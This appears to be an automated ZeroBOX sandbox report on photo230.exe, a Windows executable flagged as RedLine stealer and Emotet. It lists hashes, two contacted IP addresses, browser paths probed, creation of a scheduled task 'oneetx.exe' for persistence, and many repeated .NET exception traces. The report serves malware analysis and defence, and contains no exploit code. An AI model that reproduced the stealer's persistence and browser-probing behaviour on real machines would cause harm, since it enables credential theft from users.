Summary | ZeroBOX

photo230.exe

RedLine stealer Emotet Gen1 RedLine Stealer Malicious Library Confuser .NET UPX Admin Tool (Sysinternals etc ...) Code injection SMTP Http API Internet API HTTP PWS AntiDebug PE File OS Processor Check PE32 CAB AntiVM DLL
Category FILE
Machine s1_win7_x6401
Started May 16, 2023, 9:11 a.m.
Completed May 16, 2023, 9:13 a.m.
Size 1.1MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 bd745f43c090fd7fc5aeae0ec6b48d5a
SHA256 f23313732951aeb7b3c9582641133fdefad1ea524908df534e30c8288e76b243
CRC32 18C188C8
ssdeep 24576:vyI+UWE60Rwn0LI4/S6i0Pyz2lTwvrcKm/OL0RAu:6Iwn0LpHqz2lczpmVA
PDB Path wextract.pdb
Yara
  • UPX_Zero - UPX packed file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • Malicious_Library_Zero - Malicious_Library
  • CAB_file_format - CAB archive file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.161.248.25 Active Moloch
77.91.124.20 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
console_handle: 0x00000007
1 1 0

Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005a7b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: f3 aa 8b 45 f0 8b 4d 08 8b 55 10 03 c8 2b d0 52
exception.symbol: a9556928+0xf088
exception.instruction: stosb byte ptr es:[edi], al
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61576
exception.address: 0x40f088
registers.esp: 1636996
registers.edi: 4350244
registers.eax: 0
registers.ebp: 1637012
registers.edx: 0
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 12
1 0 0

__exception__

stacktrace:
a9556928+0xf054 @ 0x40f054
a9556928+0xf0a0 @ 0x40f0a0
a9556928+0x1fa2 @ 0x401fa2

exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d
exception.symbol: a9556928+0xefff
exception.address: 0x40efff
exception.module: a9556928.exe
exception.exception_code: 0xc0000005
exception.offset: 61439
registers.esp: 1636940
registers.edi: 4353968
registers.eax: 4350256
registers.ebp: 1636944
registers.edx: 127
registers.ebx: 0
registers.esi: 37497672
registers.ecx: 340
1 0 0

__exception__

stacktrace:
0xc83e54
0xc83d76
0xc82505
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc83f48
registers.esp: 4255416
registers.edi: 4255468
registers.eax: 0
registers.ebp: 4255480
registers.edx: 4629072
registers.ebx: 4256364
registers.esi: 45749844
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8a5ee
0xc8a4af
0xc8a3ad
0xc8900a
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254260
registers.edi: 4254484
registers.eax: 0
registers.ebp: 4254496
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 46180956
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8e740
0xc8aa23
0xc8a4af
0xc8a3ad
0xc8900a
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254472
registers.edi: 4254760
registers.eax: 0
registers.ebp: 4254480
registers.edx: 0
registers.ebx: 4256364
registers.esi: 46180956
registers.ecx: 47430152
1 0 0

_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254476
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254484
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 47120040
1 0 0

__exception__

stacktrace:
0xc8ebc4
0xc8ea70
0xc8a3c5
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254264
registers.edi: 4254488
registers.eax: 0
registers.ebp: 4254500
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8e740
0xc8efaf
0xc8ea70
0xc8a3c5
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254476
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254484
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 48468960
1 0 0

__exception__

stacktrace:
0xc8ebc4
0xc8ea70
0xc8a3c5
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254264
registers.edi: 4254488
registers.eax: 0
registers.ebp: 4254500
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8e740
0xc8efaf
0xc8ea70
0xc8a3c5
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254476
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254484
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 49817880
1 0 0

__exception__

stacktrace:
0xc8f2a3
0xc8f128
0xc8a3ad
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254276
registers.edi: 4254500
registers.eax: 0
registers.ebp: 4254512
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8e740
0xc8f643
0xc8f128
0xc8a3ad
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254488
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254496
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 47039488
1 0 0

__exception__

stacktrace:
0xc8f2a3
0xc8f128
0xc8a3c5
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254276
registers.edi: 4254500
registers.eax: 0
registers.ebp: 4254512
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8e740
0xc8f643
0xc8f128
0xc8a3c5
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254488
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254496
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 46427180
1 0 0

__exception__

stacktrace:
0xc8f2a3
0xc8f128
0xc8a3c5
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254276
registers.edi: 4254500
registers.eax: 0
registers.ebp: 4254512
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8e740
0xc8f643
0xc8f128
0xc8a3c5
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
